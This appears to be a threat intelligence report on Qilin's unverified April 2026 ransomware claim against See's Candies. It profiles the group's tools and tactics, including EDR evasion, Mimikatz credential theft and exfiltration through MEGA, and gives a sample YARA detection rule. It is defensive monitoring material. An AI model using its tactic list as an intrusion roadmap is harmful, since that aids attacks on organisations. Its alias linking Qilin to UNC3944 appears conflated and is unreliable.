See's Candies Ransomware Attack by Qilin (Apr 2026)

Claim Summary

On April 30, 2026, the Qilin ransomware group allegedly added See’s Candies (www.sees.com) to its dark web leak site. The threat actor claims to have compromised the US-based confectionery company, which operates in the Agriculture and Food Production industry. As of this writing, no data sample, proof of exfiltration, or ransom demand has been published. The data volume is listed as undisclosed. This claim has not been independently verified by Yazoul Security.

Threat Actor Profile

Qilin (also tracked as Agenda, Gold Feather, or UNC3944) is a ransomware-as-a-service (RaaS) group first observed in 2022. According to available intelligence, the group has claimed 1,617 victims across multiple sectors, with a particular focus on manufacturing, healthcare, and food production. Their credibility is moderate to high based on their track record of posting verifiable data samples in past attacks.

Known Tools and Tactics:

• Initial Access: SMS phishing, SIM swapping, and compromised credentials (per Google Cloud threat intelligence).
• Defense Evasion: Uses EDRSandBlast to blind endpoint detection and response systems, PCHunter and PowerTool for kernel-level tampering.
• Credential Theft: Mimikatz for harvesting credentials from memory.
• Reconnaissance: Nmap and Nping for network scanning.
• Exfiltration: EasyUpload.io and MEGA for data staging and exfiltration.
• Propagation: Custom PowerShell scripts to spread to VMware vCenter and ESXi hypervisors (per Trend Micro research).

Qilin is known for double extortion - encrypting systems while threatening to leak stolen data. Their leak site operations are generally consistent, though they occasionally post victims without immediate data samples to pressure negotiations.

Alleged Data Exposure

No specific data types or volumes have been disclosed by Qilin. The group has not released any screenshots, file listings, or sample archives to substantiate their claim. This could indicate:

• The attack is in early stages of negotiation.
• The group is bluffing to pressure See’s Candies.
• Data exfiltration was limited or unsuccessful.

Without evidence, the claim should be treated with high skepticism.

Potential Impact

If the claim is verified, See’s Candies could face:

• Operational Disruption: Encryption of production systems, order management, or supply chain infrastructure.
• Data Breach: Potential exposure of customer PII (names, addresses, payment data), employee records, or proprietary recipes.
• Reputational Damage: Loss of consumer trust in a heritage brand.
• Regulatory Consequences: Potential GDPR or CCPA violations if EU/California customer data is involved.

The food production sector is particularly sensitive to ransomware due to just-in-time supply chains and perishable inventory.

What to Watch For

• Leak Site Updates: Monitor Qilin’s site for any data samples or download links in the coming days.
• Official Statements: See’s Candies may issue a press release or SEC filing if the incident is confirmed.
• Technical Indicators: Look for Qilin’s known tools (Mimikatz, EDRSandBlast) in network logs or EDR alerts.
• YARA Rules: For detection, consider rules targeting Qilin’s custom PowerShell scripts and EDRSandBlast artifacts. Sample rule:

  rule QILIN_PS_Propagation {
      strings:
          $s1 = "Invoke-Command" nocase
          $s2 = "vCenter" nocase
          $s3 = "ESXi" nocase
      condition:
          all of them
  }

Disclaimer

This report is based on unverified claims posted by the Qilin ransomware group on their dark web leak site. Yazoul Security has not independently confirmed the compromise of See’s Candies. Ransomware groups routinely exaggerate or fabricate claims to pressure victims. No data samples, PII, credentials, or download links are included in this report. Organizations should treat this information as intelligence for monitoring purposes only and await official confirmation from See’s Candies or relevant authorities.

For ongoing monitoring, see Yazoul Security’s dark web monitoring section at /intel/ransomware/.